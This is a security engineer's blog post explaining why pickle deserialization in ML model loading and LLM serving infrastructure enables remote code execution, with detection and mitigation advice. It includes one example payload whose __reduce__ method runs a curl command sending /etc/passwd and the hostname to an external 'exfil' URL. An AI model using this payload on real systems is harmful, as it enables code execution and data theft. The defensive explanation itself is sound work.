Some vulnerabilities survive code review because the attack surface simply isn't part of the reviewer's threat model. Pickle deserialization in ML pipelines is that vulnerability. It sits in production at companies with dedicated security teams, passes through PR reviews written by engineers who know Python well, and gets deployed into infrastructure that handles sensitive data. Why? Because the threat model for "loading a model file" never got written down.

You'd think the problem would be solved by now. Safetensors shipped in 2022. PyTorch added weights_only=True. HuggingFace made safetensors the default in their transformers library. And yet - in 2025, Sonatype disclosed four CVEs in picklescan, the very tool HuggingFace uses to detect malicious pickle files. In April 2025, vLLM got CVE-2025-32444: a perfect CVSS 10.0 from pickle deserialization over unsecured ZeroMQ sockets. In February 2026, the same vulnerability class showed up in LightLLM and manga-image-translator. Academic research from mid-2025 found 22 distinct pickle-based model loading paths across five major ML frameworks, 19 of which existing scanners completely missed.

So let's talk about that once more.

What pickle actually is

Python's pickle module serializes and deserializes arbitrary Python objects - and the key word here is arbitrary. Unlike JSON, which can only represent data, a pickle stream can encode execution instructions. Specifically, an object's __reduce__ method can tell pickle to record a callable and its arguments in the stream. The unpickler then invokes that callable during deserialization, and the callable can be anything the deserializing process is able to import.

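The pickle protocol is effectively a stack-based virtual machine. When you call pickle.loads(), you're executing a program. The documentation says this explicitly: it warns that the pickle module is not secure, that you should only unpickle data you trust, and that malicious pickle data can execute arbitrary code during unpickling.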

This warning has been in the docs for years. It doesn't matter, because the code that loads model weights isn't written by the person who read that warning.
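To make the "stack-based virtual machine" point concrete, here is a small sketch that lists the opcodes in two pickle streams without loading either of them. The `Greeter` class and the `opcode_names` helper are hypothetical names invented for this illustration; `pickletools.genops` and `pickletools.dis` are standard library functions.

```python
import pickle
import pickletools


def opcode_names(data: bytes) -> list[str]:
    """Return the names of the opcodes in a pickle stream, in order."""
    return [opcode.name for opcode, _arg, _pos in pickletools.genops(data)]


class Greeter:
    """Hypothetical demo class: asks pickle to record a call to print()."""

    def __reduce__(self):
        return (print, ("hello from the unpickler",))


plain_data = pickle.dumps({"weights": [1, 2, 3]})
with_call = pickle.dumps(Greeter())

# Plain data only builds containers and constants.
print(opcode_names(plain_data))

# A __reduce__-based object adds an import opcode and a REDUCE (call) opcode.
print(opcode_names(with_call))

# pickletools.dis() prints an annotated disassembly without running anything.
pickletools.dis(with_call)
```

The REDUCE opcode is the instruction that calls whatever callable is on the stack. Its presence in a file that is supposed to contain "just weights" is the thing worth noticing.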

Where pickle deserialization lives in ML pipelines

The standard pattern for saving and loading a trained model in Python looks like this:

    import pickle

    # Saving
    with open("model.pkl", "wb") as f:
        pickle.dump(model, f)

    # Loading
    with open("model.pkl", "rb") as f:
        model = pickle.load(f)

Every ML tutorial ever written has some version of this. Scikit-learn docs, Kaggle notebooks, Medium posts. It gets copy-pasted into production without a second thought.

What makes it worse is that higher-level libraries use pickle under the hood without telling you. joblib.load() - the recommended way to save sklearn models - uses pickle. torch.load() uses pickle for everything except tensor data. numpy.load() with allow_pickle=True was common for a long time. HuggingFace's model hub was serving pickle-backed files for years before safetensors existed.

So in a typical ML pipeline you end up with something like:

    import joblib

    # Training service saves model
    joblib.dump(pipeline, "/models/classifier_v2.pkl")

    # Inference service loads model
    pipeline = joblib.load("/models/classifier_v2.pkl")
    result = pipeline.predict(features)

This code gets reviewed. It passes. It looks correct, because functionally it is correct. The reviewer checks the API usage, the path handling, the error cases. Nobody asks where classifier_v2.pkl actually comes from. Nobody asks whether its contents can be trusted. Why would they? It's a model file.

What a malicious pickle deserialization payload looks like

Here's the thing that surprises people who haven't seen this before - a pickle payload that executes arbitrary code is trivially short:

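    import os
    import pickle

    class MaliciousPayload:
        def __reduce__(self):
            # Called when the object is pickled. The returned (callable, args)
            # pair is written into the stream and invoked on load.
            return (os.system, ("curl https://afine.com/exfil?h=$(hostname) -d @/etc/passwd",))

    payload = pickle.dumps(MaliciousPayload())

That's it. pickle calls the __reduce__ method when the object is serialized and writes the returned callable and its arguments into the stream. During deserialization, the pickle VM imports that callable and calls it. No sandbox. No validation. No way to intercept this at the pickle.loads() level without replacing the function entirely, for example with a custom Unpickler that restricts which globals can be resolved.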

The deserialization runs with whatever privileges the inference service has. If it runs as root - which happens more often than it should in containerized ML environments - the payload runs as root. If there are cloud credentials available via instance metadata, the payload gets those too.

And here's the part that really matters: the execution is synchronous and happens before the caller gets back a model object. By the time pipeline.predict() is called, the payload has already run. You never see it.
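The ordering can be observed with a harmless stand-in. In this sketch, the hypothetical `BenignMarker` class records a call that only sets an environment variable (the name `PICKLE_DEMO_RAN` is made up for the demo), and `load_and_report` checks whether that side effect exists by the time `pickle.loads()` returns.

```python
import os
import pickle


class BenignMarker:
    """Stand-in for a malicious object; it only sets an environment variable."""

    def __reduce__(self):
        return (exec, ("import os; os.environ['PICKLE_DEMO_RAN'] = '1'",))


def load_and_report(blob: bytes) -> tuple[object, bool]:
    """Load a pickle and report whether the side effect happened during the load."""
    os.environ.pop("PICKLE_DEMO_RAN", None)
    obj = pickle.loads(blob)  # the recorded call runs inside this line
    ran = os.environ.get("PICKLE_DEMO_RAN") == "1"
    return obj, ran


blob = pickle.dumps(BenignMarker())
obj, ran_before_return = load_and_report(blob)
print(ran_before_return)  # the side effect already exists at this point
print(obj)                # whatever the recorded callable returned, not a model
```

The returned object is simply the return value of the recorded callable. A real payload would typically arrange to hand back a working model as well, which is why nothing looks wrong to the caller.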

The supply chain angle

The direct "attacker uploads a model file" scenario is real but requires access to the pipeline. The more interesting vector - and honestly the scarier one - is supply chain.

Model weights are distributed as files. HuggingFace Hub hosts over a million models, and despite the push toward safetensors, pickle is nowhere near gone. A 2025 longitudinal study by Brown University found that roughly half of popular HuggingFace repositories still contain pickle models - including models from Meta, Google, Microsoft, NVIDIA, and Intel. A significant chunk of those have no safetensors alternative at all. In practice, the trust model for downloading a community-contributed model is not very different from running pip install on a random GitHub repository - but most users do not treat it as a security decision.

This isn't hypothetical. Trail of Bits released Fickling in 2021 to demonstrate how trivial pickle exploitation is. In 2023, JFrog identified models on HuggingFace containing embedded payloads - functional models that also executed code on load. ProtectAI documented similar findings with ModelScan. And even when scanners are deployed, they can be bypassed: in 2025, both Sonatype and JFrog independently found multiple zero-day vulnerabilities in picklescan - the tool HuggingFace relies on to catch malicious uploads. The bypasses ranged from flipping ZIP file flag bits to using non-standard extensions to choosing callable targets that aren't on the scanner's blacklist. In each case, the malicious file loaded and executed just fine in PyTorch while the scanner reported it as safe.

Beyond scanner bypasses, the attack patterns themselves are pretty straightforward:

Compromised model repository account. Attacker gains access to a HuggingFace account hosting a popular model, swaps the weights file, waits. Everyone who pulls the model runs the payload.

Typosquatting. bert-base-uncased vs bert_base_uncased vs BERT-base-uncased. Nobody's going to notice when they're copy-pasting a model ID at 2am.

Malicious fine-tuned model. Attacker publishes what looks like a fine-tuned version of a legitimate model. The base weights are real, the model works, the serialization wrapper includes a payload. Nobody notices because there's nothing to notice. Researchers have even demonstrated tensor steganography - hiding malicious code in weight perturbations so small they don't affect accuracy. That result is still somewhat surprising.

The vulnerability is not in the loading code itself. It lies in the gap between "file downloaded from the internet" and "file deserialized without verification."

Beyond model files: pickle in LLM serving infrastructure

What shifted between 2023 and now is the explosion of LLM inference frameworks and the new attack surfaces they brought with them. The vulnerability class expanded from "loading untrusted model files" to "deserializing untrusted data over the network in production."



The clearest case is CVE-2025-32444 in vLLM. The Mooncake integration for distributed KV-cache transfer used recv_pyobj() on ZeroMQ sockets - which internally just calls pickle.loads() on whatever bytes show up. The sockets were bound to 0.0.0.0. No authentication. No input validation. CVSS 10.0. Any host on the network could connect and get RCE.

Same pattern in LightLLM (CVE-2026-26220, disclosed February 2026). Two WebSocket endpoints in the prefill-decode disaggregation system deserialize incoming binary frames with pickle.loads(). There was supposed to be nonce-based authentication, but the nonce defaulted to an empty string - falsy in Python - so the check never actually ran. The server explicitly refuses to bind to localhost. Always network-exposed.

    # From LightLLM's api_http.py
    data = await websocket.receive_bytes()
    obj = pickle.loads(data)  # untrusted WebSocket binary frame

This deserves a closer look because it represents a different threat model than model files. This is pickle as an IPC mechanism between distributed serving nodes. The data being serialized? Worker registration info. Status updates. Method arguments. Simple structured stuff - strings, ints, dicts. There is absolutely no reason to use pickle for this. JSON works. MessagePack works. But pickle is the path of least resistance in Python, and nobody thought about it.
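As a rough sketch of the alternative, here is what a JSON-based registration message could look like. The `WorkerRegistration` type and its fields (`node_id`, `host`, `port`) are assumptions made up for this example and are not taken from LightLLM or vLLM. The point is only that decoding yields plain data that is validated against an explicit shape.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class WorkerRegistration:
    """Hypothetical IPC message; the field names are illustrative only."""
    node_id: str
    host: str
    port: int


def encode_registration(reg: WorkerRegistration) -> bytes:
    """Serialize the message as UTF-8 JSON."""
    body = {"node_id": reg.node_id, "host": reg.host, "port": reg.port}
    return json.dumps(body).encode("utf-8")


def decode_registration(frame: bytes) -> WorkerRegistration:
    """Parse and validate a frame; any malformed input raises ValueError."""
    message = json.loads(frame.decode("utf-8"))
    if not isinstance(message, dict) or set(message) != {"node_id", "host", "port"}:
        raise ValueError("unexpected message shape")
    node_id, host, port = message["node_id"], message["host"], message["port"]
    if not isinstance(node_id, str) or not isinstance(host, str):
        raise ValueError("node_id and host must be strings")
    # bool is a subclass of int in Python, so reject it explicitly.
    if isinstance(port, bool) or not isinstance(port, int) or not 0 < port < 65536:
        raise ValueError("port must be an integer in 1..65535")
    return WorkerRegistration(node_id, host, port)


frame = encode_registration(WorkerRegistration("decode-0", "10.0.0.5", 8017))
print(decode_registration(frame))
```

A pickle payload sent to `decode_registration` fails at the parsing step with a `ValueError` subclass. The worst case is a rejected message, not code execution.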

The LightLLM timeline is worth knowing. The same vulnerability was reported by Tencent's YunDing Security Lab in May 2025. The GitHub issue got auto-closed by a stale bot after six months. No fix. The identical vulnerability class in vLLM had already received CVSS 10.0. A partial fix for a related ZMQ issue got merged in July 2025 but didn't touch the WebSocket endpoints. This isn't "nobody knew" - it's "nobody prioritized."

Why pickle deserialization survives code review

Understanding why this pattern repeatedly passes review is more interesting than the vulnerability itself.

The loading code looks correct. joblib.load(model_path) is the right API call. There's nothing wrong with it. A reviewer who doesn't have pickle deserialization in their mental threat model - and most don't - will approve it without a second look.

The vulnerability is in the data, not the code. This is the fundamental issue. Static analysis scans code. It doesn't scan the files that code will process at runtime. SAST won't flag joblib.load() because the call itself isn't a vulnerability. The vulnerability is the combination of that call with an untrusted input. Same story with pickle.loads(data) in a network handler - it's a standard library function. The problem is where data comes from.

The path between source and load is long. In a real pipeline, the model file gets downloaded by one service, stored in S3, retrieved by a model registry, cached by something else, and finally loaded by the inference service. The engineer reviewing the inference code sees model_path as a parameter. They have no visibility into the chain of custody that determined what's at that path.

ML engineers and security engineers live in different worlds. The people writing model serving code optimize for throughput and latency. Security isn't in their daily loop. The security review, when it happens, is a checklist pass by someone who doesn't know the ML-specific attack surface. Nobody's at fault here - the organizational boundary is the problem.

The pickle deserialization scanner problem

One of the more sobering things I looked into for this piece is the state of pickle scanning. It's the primary defense deployed at scale, and it's fundamentally fragile.

Picklescan works by parsing pickle bytecode and matching against a blacklist of dangerous imports - os.system, subprocess.Popen, that kind of thing. The problem: it has to interpret files exactly the way PyTorch does, and any parsing divergence creates a bypass.

The 2025 findings from Sonatype and JFrog proved this in practice. Sonatype showed you could flip ZIP flag bits and picklescan would miss the malicious content while PyTorch loaded it fine. JFrog showed that subclass imports - using a subclass of a blacklisted module instead of the module itself - would cause picklescan to downgrade the finding from "Dangerous" to "Suspicious." And academic researchers went further: they systematically identified 133 exploitable function gadgets across Python's standard library and common ML dependencies, achieving nearly 100% bypass rates against current scanners. Even the best-performing scanner still let 89% of their gadgets through.

The problem is architectural. The pickle VM has no loops or branches of its own, but it doesn't need them: it can import and call any callable reachable from the Python environment. There are effectively infinite ways to express "execute arbitrary code." Any scanner working by pattern matching is playing catch-up forever. I don't think this is a solvable problem within the current approach.

torch.load: a case study in incomplete pickle deserialization migration

Worth looking at separately because PyTorch is everywhere.

Before version 1.13, torch.load(path) would unpickle the entire checkpoint with no restrictions. In 1.13, they added weights_only=True:

    # Unsafe where weights_only defaults to False (before 2.6) - full pickle deserialization
    model.load_state_dict(torch.load("checkpoint.pt"))

    # Safer - tensor data only
    model.load_state_dict(torch.load("checkpoint.pt", weights_only=True))

PyTorch later started emitting warnings about the old default and, in version 2.6, changed it to weights_only=True. Good. But the installed base of unsafe patterns is enormous. Old tutorials are still out there.

This is kind of the whole story of pickle security in miniature. The maintainers recognized the problem, shipped a mitigation, and it still doesn't reach most production code - because adoption requires active effort, and "update all torch.load calls" doesn't end up on anyone's sprint.

In a code review: torch.load() without weights_only=True is a finding if the checkpoint source isn't fully trusted internal infrastructure. Full stop.

Detection and mitigation

Any call to pickle.load, pickle.loads, joblib.load, torch.load, or numpy.load (with allow_pickle=True) should trigger one question during review: what is the source of this data? If the answer is anything other than "generated by our own code in a trusted environment and integrity-verified before loading," that's your finding.

Same applies to network code. recv_pyobj(), pickle.loads(websocket.receive()), anything like that in a service accepting connections - same question. Is the sender authenticated? Does this data actually need to be pickled?
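A reviewer can get a first-pass list of places to ask that question with a few lines of standard-library `ast`. This is a rough sketch, not a replacement for a real SAST rule: the `RISKY_CALLS` table and the `find_risky_loads` helper are names invented here, the matching is purely syntactic, and aliased imports such as `from pickle import loads` are not handled.

```python
import ast

# (module alias, function) pairs worth a "where does this data come from?" question.
RISKY_CALLS = {
    ("pickle", "load"), ("pickle", "loads"),
    ("joblib", "load"), ("torch", "load"),
}
NUMPY_ALIASES = {"numpy", "np"}
RISKY_METHODS = {"recv_pyobj"}


def _has_allow_pickle_true(call: ast.Call) -> bool:
    """True if the call passes allow_pickle=True as a literal keyword."""
    return any(
        kw.arg == "allow_pickle"
        and isinstance(kw.value, ast.Constant)
        and kw.value.value is True
        for kw in call.keywords
    )


def find_risky_loads(source: str) -> list[tuple[int, str]]:
    """Return sorted (line, description) pairs for deserialization call sites."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not isinstance(node.func, ast.Attribute):
            continue
        attr, base = node.func.attr, node.func.value
        if isinstance(base, ast.Name) and (base.id, attr) in RISKY_CALLS:
            findings.append((node.lineno, f"{base.id}.{attr}"))
        elif (isinstance(base, ast.Name) and base.id in NUMPY_ALIASES
              and attr == "load" and _has_allow_pickle_true(node)):
            findings.append((node.lineno, f"{base.id}.load(allow_pickle=True)"))
        elif attr in RISKY_METHODS:
            findings.append((node.lineno, f".{attr}()"))
    return sorted(findings)


sample = (
    "model = joblib.load(model_path)\n"
    "msg = socket.recv_pyobj()\n"
    "arr = np.load('x.npy')\n"
    "emb = np.load('e.npy', allow_pickle=True)\n"
)
for line, what in find_risky_loads(sample):
    print(line, what)
```

The output is a list of questions, not a list of vulnerabilities. Each hit still needs a human to trace where the bytes come from.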

The fix isn't to avoid pickle entirely - sometimes that's impractical. It's to verify before deserializing and to migrate where alternatives exist.

At minimum: hash verification on model files before loading.

    import hashlib
    import pickle

    def load_verified_model(path, expected_sha256):
        with open(path, "rb") as f:
            data = f.read()
        # Hash the exact bytes that will be deserialized, so the file cannot
        # change between the check and the load.
        actual = hashlib.sha256(data).hexdigest()
        if actual != expected_sha256:
            raise ValueError(f"Model file hash mismatch: {actual}")
        return pickle.loads(data)

This only helps if expected_sha256 comes from somewhere the attacker can't also modify. If the hash sits next to the file in the same S3 bucket, you have nothing.

Better: migrate to formats that can't execute code. Safetensors for model weights, ONNX for graphs, JSON or MessagePack for metadata and IPC. The trade-off is real - safetensors only handles tensor data, so pipelines with custom preprocessing or sklearn transformers need a separate serialization strategy. But for model weights, which are the largest and most commonly shared artifacts, the migration is straightforward. And for IPC in distributed serving - the data is almost always simple structured stuff that never needed pickle in the first place.

For organizations stuck with pickle: the PickleBall project out of Brown University (CCS 2025) takes a more principled approach - generating per-library policies that whitelist only the specific callables needed for legitimate deserialization, instead of blacklisting known-bad imports. Doesn't eliminate the risk, but it's a significant reduction in attack surface compared to raw pickle.loads().
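The allowlist idea can be sketched with the hook that the standard library documents for restricting globals: subclassing `pickle.Unpickler` and overriding `find_class`. This is not PickleBall's implementation, and the `ALLOWED_GLOBALS` set below is a made-up minimal policy. A real policy would have to list exactly the callables a given library's checkpoints need.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical policy: the only globals this loader will resolve.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import anything outside ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() that enforces the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


class CallsPrint:
    """Demo payload: records a call to print(), which is not on the allowlist."""

    def __reduce__(self):
        return (print, ("this should never run",))


state = restricted_loads(pickle.dumps(OrderedDict(layer1=[0.1, 0.2])))
print(state)

try:
    restricted_loads(pickle.dumps(CallsPrint()))
except pickle.UnpicklingError as err:
    print("rejected:", err)
```

The rejection happens when the stream tries to resolve the callable, before anything is called. The remaining risk sits in the allowlisted callables themselves, which is why the policy should stay as small as possible.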

Correct architecture: model files signed at training time, signatures verified before loading, keys managed separately from model storage. Network IPC uses non-executable serialization with authenticated channels. None of this is hard to implement. Almost nobody does it. If you need to assess whether your ML infrastructure is exposed, AFINE's penetration testing team regularly identifies pickle deserialization vectors during ML security assessments.
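A minimal sketch of the sign-then-verify flow, using HMAC-SHA256 from the standard library as a stand-in for a real signature scheme. That substitution is an assumption for brevity: HMAC is symmetric, so a production setup would more likely use asymmetric signatures so that inference hosts hold only a public key. The function names and the `json.loads` loader are illustrative.

```python
import hashlib
import hmac
import json


def sign_artifact(data: bytes, key: bytes) -> str:
    """Training side: compute a hex MAC over the exact artifact bytes."""
    if not key:
        # An empty key would make the check meaningless, so fail loudly.
        raise ValueError("signing key must not be empty")
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_artifact(data: bytes, key: bytes, signature: str) -> bool:
    """Loading side: constant-time comparison against the expected MAC."""
    expected = sign_artifact(data, key)
    return hmac.compare_digest(expected.encode("ascii"), signature.encode("utf-8"))


def load_if_signed(data: bytes, key: bytes, signature: str, loader):
    """Run the loader only after the signature check has passed."""
    if not verify_artifact(data, key, signature):
        raise ValueError("artifact signature mismatch; refusing to load")
    return loader(data)


key = b"demo-key-kept-outside-model-storage"  # placeholder, not a real secret
artifact = json.dumps({"weights": [0.1, 0.2]}).encode("utf-8")
signature = sign_artifact(artifact, key)

print(load_if_signed(artifact, key, signature, json.loads))
```

The important properties are that the check covers the same bytes the loader receives, that it runs before any deserialization, and that the key is not stored anywhere the model files are.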

The organizational gap

The deeper issue - and the one I find hardest to be optimistic about - is that ML security is still years behind application security. The threat models AppSec teams built over a decade don't automatically transfer to ML teams. Nobody is systematically doing that transfer work.

Pickle deserialization is a known problem with known fixes. PyTorch has a mitigation. HuggingFace has safetensors. The tooling is there. But in most organizations, the connection between "this model loading code" and "this is RCE if the model file is compromised" just hasn't been made. It's not in anyone's threat model. It doesn't show up in sprint planning.

The same gap is now visible in LLM infrastructure. Distributed serving architectures create network-exposed IPC channels that use pickle because it's convenient. The people designing these systems are thinking about throughput. They're not thinking about whether a network peer might send malicious data. The vLLM and LightLLM CVEs are what happens when that assumption meets reality.

That's the real finding from a code review perspective. Not the specific joblib.load() call. Not the pickle.loads() in a WebSocket handler. It's the absence of any security thinking in the entire model artifact lifecycle and serving infrastructure. The loading call is a symptom. The root cause is that nobody asked the security question when the architecture was designed.

Until ML teams internalize that model files are executable code - and that pickle over the network is just eval() on untrusted input - this will keep shipping to production.

Just some thoughts from working as a security engineer around ML systems. Thanks for reading.

References

- Python pickle module documentation

- PyTorch torch.load documentation

- HuggingFace safetensors

- Trail of Bits - Never a Dill Moment: Exploiting Machine Learning Pickle Files

- ProtectAI ModelScan

- Fickling - a pickle decompiler and static analyzer

- CVE-2025-32444 - vLLM Mooncake RCE via pickle over ZeroMQ

- CVE-2026-26220 - LightLLM PD disaggregation pickle RCE

- CVE-2026-26215 - manga-image-translator pickle RCE

- Sonatype - Bypassing Picklescan: 4 Critical Vulnerabilities

- JFrog - Unveiling 3 Zero-Day PickleScan Vulnerabilities

- PickleBall: Secure Deserialization of Pickle-based ML Models (CCS 2025)

- The Art of Hide and Seek: Making Pickle-Based Model Supply Chain Poisoning Stealthy Again